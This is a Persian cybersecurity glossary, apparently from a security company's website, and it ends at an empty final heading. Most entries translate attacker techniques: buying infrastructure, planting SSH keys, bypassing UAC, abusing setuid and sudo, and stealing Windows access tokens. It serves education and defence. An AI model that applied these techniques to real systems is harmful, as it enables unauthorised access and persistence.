دیکشنری امنیت سایبری اسپارابا

در دنیای پیچیده امنیت دیجیتال، درک اصطلاحات و مفاهیم تخصصی یک چالش بزرگ است. دیکشنری امنیت سایبری ما به‌طور جامع و ساده تمامی مفاهیم، اصطلاحات فنی، و تعاریف مهم را پوشش می‌دهد. این ابزار قدرتمند به کاربران کمک می‌کند تا دانش خود را افزایش دهند، با آخرین استانداردها و تکنولوژی‌های امنیتی هماهنگ شوند، و تصمیمات دقیق و آگاهانه‌تری در برابر تهدیدات سایبری بگیرند. به کمک این دیکشنری، دیگر هیچ اصطلاحی برای شما مبهم نخواهد ماند! این دیکشنری آخرین ورژن اصطلاحات و لغات را بر اساس کتاب دیکشنری امنیت سایبری گردآوری کرده است.

image

تبلیغات

Adware

نرم افزاری است که وقتی کاربر آفلاین است، مطالب را به طور خودکار نمایش داده یا بارگیری می‌کند.

کرم‌های اتوران

Autorun Worms

این‌ها برنامه‌های مخربی هستند که از طریق دستگاه‌های ذخیره سازی خارجی اجرا می‌شوند. این برنامه‌ها از ویژگی autorun ویندوز استفاده می‌کنند، بنابراین به عنوان کرم autorun شناخته می‌شوند.

تهدیدات مداوم پیشرفته

Advanced Persistent Threats

هنگامی که یک کاربر غیرمجاز به شبکه حمله می‌کند، برای مدت زمان طولانی می‌ماند و بدون آسیب‌رساندن به شبکه، داده‌ها را سرقت می‌کند.

بردار حمله

Attack Vector

بردار حمله حامل یا وسیله‌ای است که از طریق آن هکرها به سیستم‌های هدف خود حمله می‌کنند. بردار حمله می‌تواند پیوست ایمیل آلوده، پیوند مخرب، پنجره‌های بازشو و ... باشد.

احراز هویت

Authenticator

روشی که در آن هویت کاربر تأیید می‌شود.

امتیاز مدیر

Admin privilege

داشتن کنترل نهایی بر روی هر سیستم معین.

آنتی ویروس

Antivirus

نرم افزاری است که برای جلوگیری، حذف و تشخیص بدافزارهای مضر استفاده می‌شود و امنیت را در برابر تهدیدهای متعدد، نه تنها ویروس‌های رایانه‌ای، تأمین می‌کند.

مدیریت دارایی‌ها

Asset Management

مدیریت دارایی‌های امنیت سایبری شامل فرایند شناسایی و دارایی‌های فناوری اطلاعاتی است که سازمان‌ها در اختیار دارند و خطرات احتمالی امنیتی یا شکاف‌هایی که بر هر یک تأثیر می‌گذارد. این دارایی‌ها می‌توانند دستگاه‌های سنتی مانند رایانه‌های شخصی و سرورها باشند.

در دسترس بودن، موجود بودن

Availability

در دسترس بودن به معنی حفاظت از عملکرد سیستم‌های پشتیبانی است و اطمینان از دسترسی کامل داده‌ها در برهه زمانی (یا الزامات دوره) زمانی که مورد نیاز کاربران است. هدف از در دسترس بودن این است که اطمینان حاصل شود که داده‌ها برای استفاده در زمان تصمیم‌گیری مورد نیاز است.

معماری امنیت سایبری

A cyber security architecture

معماری امنیت سایبری پایه دفاع سازمان‌ها در برابر تهدیدات سایبری است و تضمین می‌کند که همه اجزای زیرساخت فناوری اطلاعات آن محافظت می‌شود. محیط‌هایی که با معماری امنیت سایبری ایمن شده‌اند عبارتند از: شبکه‌های اینترنت اشیا.

حملات به عنوان سرویس، بدافزار به عنوان سرویس

Attack as a Service

حملات به عنوان سرویس، بدافزار به عنوان سرویس و کلاهبرداری به عنوان سرویس همه اصطلاحاتی هستند که معمولاً برای ارائه فعالیت‌های غیرقانونی توسط مجرمان سایبری استفاده می‌شوند.

آنالیز کردن

Analysis

بررسی دقیق هر مورد پیچیده‌ای به منظور درک ماهیت آن یا تعیین ویژگی‌های اساسی آن.

استراتژی رویکرد

Approach Strategy

تدوین رویکردی مبتنی بر تاثیر احتمالی روی افراد عادی و فناوری خاص مورد نظر

کپی برداری، اکتساب

Acquisition

پروسه تهیه کپی پس از مصادره شواهد جرم. یک کپی بسیار دقیق در سطح سکتور از رسانه مورد نظر معمولا با استفاده از دستگاه Write گرفته می‌شود.

هوش مصنوعی

Artificial Intelligence

هوش مصنوعی برای تشخیص تهدیدها، تسریع در سرعت پاسخگویی آن و جلوگیری از حملات مفید است

ریسک قابل قبول

Acceptable Risk

ریسکی که احتمال وقوع حادثه یا قرار گرفتن در معرض خطر و شدت صدمه‌ای که ممکن است ناشی از آن باشد به همان اندازه که امکان پذیر است و در شرایطی که در نظر گرفته می‌شود قابل تحمل است.

به دست‌آوردن زیرساخت

Acquire Infrastructure

دشمنان ممکن است زیرساخت‌هایی را خریداری یا اجاره کنند که می‌تواند در هنگام هدف‌گیری مورد استفاده قرار گیرد. طیف گسترده‌ای از زیرساخت‌ها برای میزبانی و سازماندهی عملیات دشمن وجود دارند. راه حل‌های زیرساختی شامل سرورهای فیزیکی یا ابری، دامنه‌ها و خدمات وب شخص ثالث می‌باشد. علاوه بر این، بات نت‌ها برای اجاره یا خرید در دسترس هستند. استفاده از این راه‌حل‌های زیرساختی به دشمن اجازه می‌دهد تا عملیاتی را مرحله‌بندی‌، راه‌اندازی و اجرا کند. راه‌حل‌ها ممکن است به عملیات متخاصم کمک کند تا با ترافیکی که معمولی به نظر می‌رسد ترکیب شود، مانند تماس با سرویس‌های وب شخص ثالث. بسته به نحوه اجرا، دشمنان ممکن است از زیرساخت‌هایی استفاده کنند که اتصال فیزیکی به آنها را دشوار می‌کند و همچنین از زیرساخت‌هایی که می‌توانند به سرعت تأمین، اصلاح و تعطیل شود، استفاده کنند.

الگوهای حمله

Attack Patterns

لگوهای حمله توصیف ویژگی‌ها و رویکردهای متداول مورد استفاده دشمنان برای بهره‌برداری از ضعف‌های شناخته شده در قابلیت‌های فعال در فضای مجازی است. الگوهای حمله چالش‌هایی را که ممکن است دشمن با آن روبرو شود و نحوه حل آن را مشخص می‌کند. هر الگوی حمله اطلاعاتی در مورد نحوه طراحی و اجرای بخش‌های خاصی از حمله به دست می‌آورد و در مورد راه‌های کاهش اثربخشی حمله راهنمایی می‌کند.

به دست‌آوردن زیرساخت: دامنه‌ها

Acquire Infrastructure: Domains

دشمنان ممکن است دامنه‌هایی را خریداری کنند که می‌توانند در هنگام هدف‌گیری از آنها استفاده کنند. نام‌های دامنه، نام‌های قابل خواندن توسط انسان هستند که برای نشان دادن یک یا چند آدرس IP استفاده می‌شوند. آنها را می‌توان خریداری کرد یا در برخی موارد به صورت رایگان خریداری کرد. دشمنان می‌توانند از دامنه‌های خریداری‌شده برای مقاصد مختلف، از جمله برای فیشینگ، Drive-by Compromise وCommand and Control استفاده کنند. دشمنان ممکن است دامنه‌هایی را انتخاب کنند که شبیه به دامنه‌های قانونی هستند، از جمله از طریق استفاده از هموگلیف‌ها یا استفاده از یک دامنه سطح بالا.

به دست‌آوردن زیرساخت : سرور DNS

Acquire Infrastructure: DNS Server

دشمنان ممکن است سرورهای سیستم نام دامنه (DNS) خود را راه‌اندازی کنند که می‌تواند در هنگام هدف‌گیری استفاده شود. در طول فعالیت پس از سازش، دشمنان ممکن است از ترافیک DNS برای وظایف مختلف، از جمله برای فرمان و کنترل (مثلاً پروتکل لایه برنامه) استفاده کنند. به جای ربودن سرورهای DNS موجود، دشمنان ممکن است برای پشتیبانی از عملیات، سرورهای DNS خود را پیکربندی و اجرا کنند. با اجرای سرورهای DNS خود، دشمنان می‌توانند کنترل بیشتری بر نحوه مدیریت ترافیک DNS C2 سمت سرور ( DNS) داشته باشند. با کنترل سرور DNS، دشمنان می‌توانند برنامه‌های DNS را برای ارائه پاسخ‌های مشروط به بدافزار پیکربندی کنند و به طور کلی، انعطاف‌پذیری بیشتری در ساختار کانال C2مبتنی بر DNS داشته باشند.

به دست‌آوردن زیرساخت: سرور خصوصی مجازی

Acquire Infrastructure: Virtual Private Server

دشمنان ممکن است سرورهای خصوصی مجازی (VPS) را اجاره کنند که می‌توانند در هنگام هدف‌گیری استفاده شوند. ارائه دهندگان خدمات ابری مختلفی وجود دارند که ماشین‌های مجازی/کانتینرها را به عنوان یک سرویس می‌فروشند. با استفاده ازVPS، دشمنان می‌توانند پیوند فیزیکی عملیات را با آنها دشوار کنند. استفاده از زیرساخت‌های ابری همچنین می‌تواند تدارک سریع، اصلاح و خاموش کردن زیرساخت‌های خود را برای دشمنان آسان‌تر کند. به دست آوردن یک VPSبرای استفاده در مراحل بعدی چرخه حیات دشمن، مانند فرمان و کنترل، می تواند به دشمنان اجازه دهد از همه‌جا و اعتماد مرتبط با ارائه دهندگان خدمات ابری با شهرت بالاتر بهره مند شوند. دشمنان همچنین می‌توانند زیرساخت‌هایی را از ارائه‌دهندگان خدمات VPS که برای اجاره VPS با حداقل اطلاعات ثبت‌نام شناخته شده‌اند، به دست آورند، که امکان خرید ناشناس بیشتر زیرساخت‌ها را فراهم می‌کند.

به دست آوردن زیرساخت: سرور

Acquire Infrastructure: Server

دشمنان ممکن است سرورهای فیزیکی را بخرند، اجاره کنند یا کرایه کنند که می‌توانند در هنگام هدف‌گیری از آنها استفاده کنند. استفاده از سرورها به حریف اجازه می‌دهد تا عملیات را مرحله بندی، راه اندازی و اجرا کند. در طول فعالیت پس از سازش، دشمنان ممکن است از سرورها برای کارهای مختلف از جمله برای فرماندهی و کنترل استفاده کنند. به جای به خطر انداختن یک سرور شخص ثالث یا اجاره یک سرور خصوصی مجازی، ممکن است دشمنان برای پشتیبانی از عملیات، سرورهای خود را پیکربندی و اجرا کنند. دشمنان ممکن است فقط به یک راه‌اندازی سبک وزن نیاز داشته باشند که بیشتر فعالیت‌های آنها با استفاده از زیرساخت آنلاین انجام شود. یا اگر بخواهند سایر جنبه‌های فعالیت‌های خود را در سیستم‌های خود آزمایش، برقراری ارتباط و کنترل کنند، ممکن است نیاز به ایجاد زیرساخت‌های گسترده داشته باشند.

به دست آوردن زیرساخت: بات نت

Acquire Infrastructure: Botnet

دشمنان ممکن است شبکه‌ای از سیستم‌های در معرض خطر را بخرند، اجاره کنند یا اجاره کنند که می‌توان از آنها در هنگام هدف‌گیری استفاده کرد. بات‌نت شبکه‌ای از سیستم‌های در معرض خطر است که می‌توان برای انجام وظایف هماهنگ دستور داد. دشمنان ممکن است برای استفاده از بات نت موجود از یک سرویس راه انداز/استرس، اشتراک خریداری کنند. با داشتن یک بات نت در اختیار دشمنان، ممکن است فعالیت‌های بعدی مانند فیشینگ در مقیاس بزرگ یا انکار سرویس توزیع شده ( DDoS) را انجام دهند.

به دست آوردن زیرساخت: خدمات وب

Acquire Infrastructure: Web Services

دشمنان ممکن است برای سرویس‌های وب که می‌توانند در هنگام هدف‌گیری استفاده شوند ثبت نام کنند. انواع وب سایت‌های محبوب برای دشمنان وجود دارد تا برای یک سرویس مبتنی بر وب ثبت نام کنند که می‌تواند در مراحل بعدی چرخه حیات دشمن مورد سوء استفاده قرار گیرد، مانند هنگام فرماندهی و کنترل (وب سرویس) یا Exfiltration Over Web Service استفاده از سرویس‌های رایج، مانند سرویس‌هایی که توسط گوگل یا توییتر ارائه می‌شود، مخفی شدن در نویز مورد انتظار را برای دشمنان آسان‌تر می‌کند. با استفاده از یک وب سرویس، دشمنان می توانند پیوند فیزیکی عملیات را با آنها دشوار کنند.

اسکن فعال

Active Scanning

دشمنان ممکن است اسکن‌های شناسایی فعال را برای جمع‌آوری اطلاعاتی که در هنگام هدف‌گیری استفاده می‌شود، انجام دهند. اسکن‌های فعال آنهایی هستند که در آن دشمن از زیرساخت‌های قربانیان از طریق ترافیک شبکه کاوش می‌کند، در مقایسه با سایر روش‌های شناسایی که تعامل مستقیم را شامل نمی‌شود. بسته به اطلاعاتی که می‌خواهند جمع‌آوری کنند، دشمنان ممکن است انواع مختلفی از اسکن فعال را انجام دهند. این اسکن‌ها همچنین می‌توانند به روش‌های مختلف انجام شوند، از جمله استفاده از ویژگی‌های بومی پروتکل‌های شبکه مانندICMP . اطلاعات حاصل از این اسکن‌ها ممکن است فرصت‌هایی را برای سایر اشکال شناسایی (به عنوان مثال: جستجو در وب‌سایت‌ها/دامنه‌های باز یا جستجو در پایگاه‌های اطلاعات فنی باز)، ایجاد منابع عملیاتی (به عنوان مثال: توسعه قابلیت‌ها یا دستیابی به قابلیت‌ها) و/یا دسترسی اولیه (مانند: کنترل از راه دور خارجی)

دستکاری حساب

Account Manipulation

دشمنان ممکن است حساب ها را برای حفظ دسترسی به سیستم های قربانی دستکاری کنند. دستکاری حساب ممکن است شامل هر اقدامی باشد که دسترسی دشمن را به یک حساب در معرض خطر حفظ می‌کند، مانند اصلاح اعتبار یا گروه‌های مجوز. این اقدامات همچنین می‌تواند شامل فعالیت حساب باشد که برای برهم زدن خط‌مشی‌های امنیتی طراحی شده است، مانند انجام به‌روزرسانی‌های تکراری رمز عبور برای دور زدن خط‌مشی‌های مدت زمان رمز عبور و حفظ عمر اعتبارنامه‌های در معرض خطر. برای ایجاد یا دستکاری حساب‌ها، حریف باید از قبل مجوزهای کافی روی سیستم‌ها یا دامنه داشته باشد.

دستکاری حساب: اعتبارنامه های اضافی Cloud

Account Manipulation: Additional Cloud Credentials

دشمنان ممکن است اعتبارنامه های کنترل شده توسط دشمن را به یک حساب ابری اضافه کنند تا دسترسی دائمی به حساب های قربانی و نمونه های موجود در محیط را حفظ کنند. دشمنان می‌توانند علاوه بر اعتبارنامه‌های قانونی موجود در Azure AD، اعتبارنامه‌هایی را برای اصول سرویس و برنامه‌های کاربردی اضافه کنند، این اعتبارنامه ها شامل کلیدهای X509و رمزهای عبور می شود. با مجوزهای کافی، راه‌های مختلفی برای افزودن اعتبارنامه‌ها از جمله پورتال Azure، رابط خط فرمان Azure، و ماژول‌های Azure یا Az PowerShell وجود دارد. در محیط‌های زیرساخت به‌عنوان سرویس (IaaS) ، پس از دسترسی از طریق حساب‌های ابری، دشمنان ممکن است کلیدهای SSH خود را با استفاده از CreateKeyPair یا ImportKeyPair API در AWS یا دستور add gcloud os-login ssh-keys تولید یا وارد کنند. در GCP این امکان دسترسی مداوم به نمونه‌های موجود در محیط ابری را بدون استفاده بیشتر از حساب‌های ابری در معرض خطر فراهم می‌کند.

دستکاری حساب: تبادل مجوزهای ارسال ایمیل

Account Manipulation: Exchange Email Delegate Permissions

دشمنان ممکن است سطوح مجوز اضافی مانند ReadPermission یا FullAccess را برای حفظ دسترسی دائمی به یک حساب ایمیل تحت کنترل دشمن اعطا کنند. Add-MailboxPermission PowerShell cmdlet، موجود در Exchange on-premises و در سرویس مبتنی بر ابر Office365 مجوزها را به صندوق پستی اضافه می کند. دشمنان همچنین ممکن است مجوزهای پوشه صندوق پستی را از طریق مجوزها یا نقش های پوشه فردی اختصاص دهند. دشمنان ممکن است مجوزها یا نقش‌های کاربر پیش‌فرض یا ناشناس را به پوشه‌های Top of Information Store (root)، Inbox یا سایر پوشه‌های صندوق پستی اختصاص دهند. با اختصاص دادن یک یا هر دو مجوز کاربر به یک پوشه، حریف می‌تواند از هر حساب دیگری در مستاجر برای حفظ ماندگاری پوشه‌های ایمیل کاربر هدف استفاده کند. این ممکن است در حوادث تهدید مداوم و همچنین حوادث BEC استفاده شود که در آن دشمن می تواند حقوق دسترسی بیشتری را به حساب هایی که می خواهد به خطر بیاندازد اختصاص دهد. این ممکن است استفاده از تکنیک های اضافی را برای دستیابی به سیستم ها امکان پذیر کند. به عنوان مثال، حساب‌های تجاری در معرض خطر اغلب برای ارسال پیام‌ها به حساب‌های دیگر در شبکه کسب‌وکار مورد نظر در حین ایجاد قوانین صندوق ورودی (مثلاً Spearphishing داخلی)، استفاده می‌شوند، بنابراین پیام‌ها از مکانیسم‌های تشخیص هرزنامه/فیشینگ اجتناب می‌کنند.

دستکاری حساب: اضافه کردن نقش مدیر جهانی Office365

Account Manipulation: Add Office 365 Global Administrator Role

یک دشمن ممکن است نقش مدیر جهانی را به حسابی که توسط دشمن کنترل می‌شود اضافه کند تا دسترسی دائمی به مستاجر Office365را حفظ کند. با مجوزهای کافی، یک حساب در معرض خطر می‌تواند دسترسی تقریباً نامحدودی به داده‌ها و تنظیمات (از جمله قابلیت بازنشانی گذرواژه‌های سایر مدیران) از طریق نقش مدیر جهانی داشته باشد. این تغییر حساب ممکن است بلافاصله به دنبال ایجاد حساب یا سایر فعالیت‌های مخرب حساب باشد.

دستکاری حساب: کلیدهای مجاز SSH

Account Manipulation: SSH Authorized Keys

دشمنان ممکن است فایل SSH authorized_keys را برای حفظ پایداری روی میزبان قربانی تغییر دهند. توزیع‌های لینوکس و macOS معمولاً از احراز هویت مبتنی بر کلید برای ایمن کردن فرآیند احراز هویت جلسات SSH برای مدیریت از راه دور استفاده می‌کنند. فایل authorized_keys در SSH کلیدهای SSH را مشخص می کند که می توانند برای ورود به حساب کاربری که فایل برای آن پیکربندی شده است استفاده شود. این فایل معمولاً در فهرست اصلی کاربر در زیر<user-home>/.ssh/authorized_keys یافت می شود. کاربران می‌توانند فایل پیکربندی SSH سیستم را ویرایش کنند تا دستورالعمل‌های PubkeyAuthentication و RSAAAuthentication را به مقدار " "yes تغییر دهند تا مطمئن شوند که کلید عمومی و احراز هویت RSA فعال هستند. فایل پیکربندی SSH معمولاً در زیر /etc/ssh/sshd_config قرار دارد. دشمنان ممکن است فایل‌های SSH authorized_keys را مستقیماً با اسکریپت ها یا دستورات پوسته تغییر دهند تا کلیدهای عمومی ارائه شده توسط دشمن خود را اضافه کنند. این تضمین می کند که دشمنی که کلید خصوصی مربوطه را در اختیار دارد می تواند به عنوان یک کاربر موجود از طریق SSH وارد شود.

مکانیسم کنترل ارتفاع سوء استفاده

Abuse Elevation Control Mechanism

دشمنان ممکن است مکانیسم های طراحی شده برای کنترل امتیازات بالا را برای به دست آوردن مجوزهای سطح بالاتر دور بزنند. اکثر سیستم‌های مدرن دارای مکانیسم‌های کنترل ارتفاع بومی هستند که هدف آن محدود کردن امتیازاتی است که کاربر می‌تواند روی یک ماشین انجام دهد. مجوز باید به کاربران خاصی اعطا شود تا کارهایی را انجام دهند که می تواند ریسک بالاتری در نظر گرفته شود. یک دشمن می تواند چندین روش را برای استفاده از مکانیسم های کنترل داخلی به منظور افزایش امتیازات در یک سیستم انجام دهد.

مکانیسم کنترل ارتفاع سوء استفاده: Setuid و Setgid

Abuse Elevation Control Mechanism: Setuid and Setgid

حریف ممکن است با استفاده از بیت‌های setsuid یا setgid از آسیب‌پذیری‌های پوسته استفاده کند یا از آسیب‌پذیری‌های موجود در یک برنامه برای اجرای کد در زمینه کاربر دیگر استفاده کند. در لینوکس یا macOS، وقتی بیت‌های setuid یا setgid برای یک برنامه تنظیم می‌شوند، برنامه به ترتیب با امتیازات کاربر یا گروه مالک اجرا می‌شود. به طور معمول یک برنامه در زمینه کاربر فعلی اجرا می شود، صرف نظر از اینکه کدام کاربر یا گروه مالک برنامه است. با این حال، مواردی وجود دارد که برنامه‌ها باید در یک زمینه بالا اجرا شوند تا به درستی کار کنند، اما کاربری که آنها را اجرا می‌کند به امتیازات بالا نیاز ندارد. به جای ایجاد یک ورودی در فایل sudoers، که باید توسط روت انجام شود، هر کاربری می تواند پرچم setuid یا setgid را برای برنامه های خود تعیین کند. این بیت ها در هنگام مشاهده ویژگی های فایل از طریق ls –l به جای x با یک "s" نشان داده می شوند. برنامه chmod می‌تواند این بیت‌ها را با via bitmasking، chmod 4777 [file] تنظیم کند. دشمنان می توانند از این مکانیسم بر روی بدافزار خود استفاده کنند تا مطمئن شوند که در آینده قادر به اجرا در زمینه های بالا هستند.

مکانیسم کنترل ارتفاع سوء استفاده: دور زدن کنترل حساب کاربری

Abuse Elevation Control Mechanism: Bypass User Account Control

دشمنان ممکن است مکانیسم های UAC را دور بزنند تا امتیازات فرآیند را در سیستم افزایش دهند. (UAC) به یک برنامه اجازه می‌دهد تا امتیازات خود را (که به صورت سطوح یکپارچگی از پایین به بالا دنبال می‌شود) برای انجام یک کار تحت مجوزهای سطح سرپرست، احتمالاً با درخواست از کاربر برای تأیید، افزایش دهد. تأثیر آن بر کاربر از انکار عملیات تحت اجرای بالا تا اجازه دادن به کاربر برای انجام این عمل در صورتی که در گروه مدیران محلی باشد و از طریق فرمان کلیک کند یا اجازه دادن به آنها برای وارد کردن رمز عبور سرپرست برای تکمیل عمل، انجام شود. اگر سطح حفاظت UAC یک رایانه روی چیزی جز بالاترین سطح تنظیم شده باشد، برخی از برنامه‌های ویندوز می‌توانند امتیازات را افزایش دهند یا برخی از اشیاء مدل شیء کامپوننت بالا را بدون درخواست از کاربر از طریق جعبه اعلان UAC اجرا کنند. یک مثال از این استفاده از برای بارگیری یک DLL ساخته شده خاص است که یک شیء مدل شیء کامپوننت با ارتفاع خودکار را بارگیری می کند و یک عملیات فایل را در یک دایرکتوری محافظت شده انجام می دهد که معمولاً به دسترسی بالا نیاز دارد. همچنین ممکن است نرم افزارهای مخرب به یک فرآیند قابل اعتماد تزریق شود تا بدون درخواست کاربر، امتیازات بیشتری به دست آورد. روش های زیادی برای دور زدن UAC کشف شده است. صفحه Github readme برای UACME شامل فهرست گسترده‌ای از روش‌ها است که کشف و پیاده‌سازی شده‌اند، اما ممکن است فهرست جامعی از بای‌پس‌ها نباشد. روش های بای پس اضافی به طور منظم کشف می شوند و برخی در طبیعت مورد استفاده قرار می گیرند، مانند: eventvwr.exe می‌تواند به صورت خودکار یک باینری یا اسکریپت مشخص را بالا ببرد و اجرا کند. در صورتی که اعتبار یک حساب کاربری با امتیازات مدیر شناخته شده باشد، از طریق برخی از تکنیک‌های حرکت جانبی امکان‌پذیر است، زیرا UAC یک مکانیسم امنیتی سیستم واحد است و امتیاز یا یکپارچگی فرآیندی که در یک سیستم اجرا می‌شود در سیستم‌های راه دور ناشناخته خواهد بود و به‌طور پیش‌فرض صداقت بالا.

مکانیسم کنترل ارتفاع سوء استفاده: ذخیره سازی سودو و سودو

Abuse Elevation Control Mechanism: Sudo and Sudo Caching

دشمنان ممکن است sudo caching را انجام دهند و یا از فایل suoders برای بالا بردن امتیازات استفاده کنند. دشمنان ممکن است این کار را برای اجرای دستورات به عنوان سایر کاربران یا ایجاد فرآیندهایی با امتیازات بالاتر انجام دهند. در سیستم‌های لینوکس و MacOS، sudo گاهی اوقات به عنوان "superuser do" نامیده می‌شود) به کاربران اجازه می‌دهد تا دستورات را از ترمینال‌هایی با امتیازات بالا انجام دهند و کنترل کنند که چه کسی می‌تواند این دستورات را روی سیستم انجام دهد. دستور sudoبه مدیر سیستم اجازه می‌دهد تا به کاربران خاصی (یا گروه‌هایی از کاربران) توانایی اجرای برخی (یا همه) دستورات را به‌عنوان کاربر اصلی یا کاربر دیگر در حالی که دنباله حسابرسی از دستورات و آرگومان‌های آن‌ها ارائه می‌کند، تفویض کند. از آنجایی که sudo برای مدیر سیستم ساخته شده است، دارای برخی از ویژگی های پیکربندی مفید مانند timestamp_timeout است، که مقدار زمانی است که در چند دقیقه بین نمونه های sudo قبل از درخواست مجدد رمز عبور است. این به این دلیل است که sudo این قابلیت را دارد که اعتبارنامه‌ها را برای یک دوره زمانی کش کند. Sudo فایلی را در /var/db/sudo ایجاد می‌کند (یا لمس می‌کند) با یک مهر زمانی از آخرین اجرای sudo برای تعیین این زمان. علاوه بر این، یک متغیر timestamp_timeoutوجود دارد که هر tty جدید (جلسه پایانی) را به صورت مجزا بررسی می کند. این به این معنی است که، برای مثال، مهلت زمانی sudo یک tty روی tty دیگر تأثیری نخواهد داشت.

مکانیسم کنترل ارتفاع سوء استفاده: اجرای بالا با اعلان

Abuse Elevation Control Mechanism: Elevated Execution with Prompt

دشمنان ممکن است از API AuthorizationExecuteWithPrivileges برای افزایش امتیازات با درخواست از کاربر برای دریافت اعتبار استفاده کنند. هدف از این API این است که به توسعه دهندگان برنامه یک راه آسان برای انجام عملیات با امتیازات ریشه، مانند نصب یا به روز رسانی برنامه، بدهد. این API تأیید نمی کند که برنامه درخواست کننده امتیازات ریشه از یک منبع معتبر می آید یا به طور مخرب اصلاح شده است. اگرچه این API منسوخ شده است، اما همچنان در آخرین نسخه‌های macOS به طور کامل عمل می‌کند. هنگام فراخوانی این API، از کاربر خواسته می شود تا اطلاعات کاربری خود را وارد کند، اما هیچ بررسی در مورد منشاء یا یکپارچگی برنامه انجام نمی شود. برنامه ای که API را فراخوانی می کند ممکن است فایل های قابل نوشتن جهان را نیز بارگیری کند که می توانند برای انجام رفتارهای مخرب با امتیازات بالا تغییر داده شوند. دشمنان ممکن است از AuthorizationExecuteWithPrivileges برای به دست آوردن امتیازات ریشه به منظور نصب نرم افزارهای مخرب بر روی قربانیان و نصب مکانیسم‌های پایدار سوء استفاده کنند. این تکنیک ممکن است با Masquerading ترکیب شود تا کاربر را فریب دهد تا امتیازات فزاینده‌ای به کدهای مخرب بدهد. همچنین نشان داده شده است که این تکنیک با اصلاح برنامه های قانونی موجود در دستگاهی که از این API استفاده می کند، کار می کند.

دستکاری توکن دسترسی

Access Token Manipulation

دشمنان ممکن است توکن‌های دسترسی را تغییر دهند تا تحت یک زمینه امنیتی کاربر یا سیستم متفاوت عمل کنند تا اقدامات را انجام دهند و کنترل های دسترسی را دور بزنند. ویندوز از نشانه های دسترسی برای تعیین مالکیت یک فرآیند در حال اجرا استفاده می کند. یک کاربر می‌تواند توکن‌های دسترسی را دستکاری کند تا فرآیند در حال اجرا به نظر برسد که گویی فرزند فرآیند دیگری است یا متعلق به شخصی غیر از کاربر است که فرآیند را آغاز کرده است. هنگامی که این اتفاق می افتد، فرآیند همچنین زمینه امنیتی مرتبط با توکن جدید را به خود می گیرد. حریف می‌تواند از توابع API داخلی ویندوز برای کپی کردن نشانه های دسترسی از فرآیندهای موجود استفاده کند. این به عنوان سرقت رمز شناخته می شود. سپس می‌توان این توکن‌ها را روی یک فرآیند موجود اعمال کرد (یعنی جعل هویت / سرقت) یا برای ایجاد یک فرآیند جدید (یعنی ایجاد فرآیند با توکن) استفاده کرد. یک حریف باید قبلاً در یک زمینه کاربری ممتاز (یعنی مدیر) برای سرقت یک توکن باشد. با این حال، دشمنان معمولاً از سرقت رمز استفاده می‌کنند تا زمینه امنیتی خود را از سطح مدیر به سطح SYSTEM ارتقا دهند. اگر حساب دارای مجوزهای مناسب در سیستم راه دور باشد، یک دشمن می‌تواند از یک رمز برای احراز هویت به یک سیستم راه دور به عنوان حساب آن نشانه استفاده کند. هر کاربر استاندارد می تواند از دستور runas و توابع Windows API برای ایجاد نشانه های جعل هویت استفاده کند. نیازی به دسترسی به حساب مدیر نیست. همچنین مکانیسم‌های دیگری مانند فیلدهای Active Directory وجود دارد که می‌توان از آنها برای اصلاح توکن‌های دسترسی استفاده کرد.

دستکاری توکن دسترسی: جعل هویت / سرقت رمز

Access Token Manipulation: Token Impersonation/Theft

دشمنان ممکن است برای افزایش امتیازات و دور زدن کنترل‌های دسترسی، توکن کاربر دیگری را کپی کرده و جعل هویت کنند. یک حریف می تواند یک توکن دسترسی جدید ایجاد کند که با استفاده از DuplicateToken(Ex) یک توکن موجود را کپی می‌کند. سپس این توکن را می‌توان با ImpersonateLoggedOnUser استفاده کرد تا به رشته فراخوانی اجازه دهد تا جعل هویت کاربر ثبت‌شده در زمینه امنیتی کاربر، یا با SetThreadTokenبرای تخصیص رمز جعل شده به یک رشته استفاده شود. یک حریف ممکن است این کار را زمانی انجام دهد که یک فرآیند خاص و موجود داشته باشد که می خواهد توکن جدید را به آن اختصاص دهد. به عنوان مثال، این ممکن است برای زمانی مفید باشد که کاربر هدف یک جلسه لاگین غیر شبکه در سیستم داشته باشد.

دستکاری توکن دسترسی: ایجاد فرآیند با توکن

Access Token Manipulation: Create Process with Token

دشمنان ممکن است یک فرآیند جدید با یک توکن متفاوت برای افزایش امتیازات و دور زدن کنترل‌های دسترسی ایجاد کنند. فرآیندها را می توان با توکن و زمینه امنیتی ناشی از کاربر دیگر با استفاده از ویژگی هایی مانند CreateProcessWithTokenW و runa ایجاد کرد. ایجاد فرآیندها با یک نشانه متفاوت ممکن است به اعتبار کاربر هدف، امتیازات خاص برای جعل هویت کاربر، یا دسترسی به رمز مورد استفاده نیاز داشته باشد (مثلاً: جمع آوری شده از طریق ابزارهای دیگری مانند جعل هویت / سرقت یا ساخت و جعل نماد).

دستکاری توکن دسترسی: ساخت رمز و جعل آن

Access Token Manipulation: Make and Impersonate Token

دشمنان ممکن است برای افزایش امتیازات و دور زدن کنترل‌های دسترسی، توکن‌هایی بسازند و جعل هویت کنند. اگر حریف نام کاربری و رمز عبور داشته باشد اما کاربر وارد سیستم نشده باشد، دشمن می‌تواند با استفاده از عملکرد LogonUser یک جلسه ورود به سیستم برای کاربر ایجاد کند. این تابع یک کپی از نشانه دسترسی جلسه جدید را برمی گرداند و حریف می تواند از SetThreadToken برای اختصاص رمز به یک رشته استفاده کند.

دستکاری توکن دسترسی: جعل PID والدین

Access Token Manipulation: Parent PID Spoofing

دشمنان ممکن است شناسه فرآیند والد (PPID )یک فرآیند جدید را برای فرار از دفاع نظارت بر فرآیند یا افزایش امتیازات جعل کنند. فرآیندهای جدید معمولاً مستقیماً از فرآیند والد یا فراخوانی ایجاد می شوند مگر اینکه به صراحت مشخص شده باشد. یکی از راه‌های تخصیص صریح PPID یک فرآیند جدید، از طریق فراخوانی CreateProcess API است که از پارامتری پشتیبانی می‌کند که PPID مورد استفاده را تعریف می‌کند. این قابلیت توسط ویژگی‌های ویندوز مانند کنترل حساب کاربری (UAC)برای تنظیم صحیح PPID پس از ایجاد یک فرآیند بالا درخواست شده توسط سیستم معمولاً از طریق svchost.exe یا consent.exeبه جای زمینه کاربر فعلی استفاده می‌شود.

دستکاری توکن دسترسی: تزریق تاریخچه SID

Access Token Manipulation: SID-History Injection

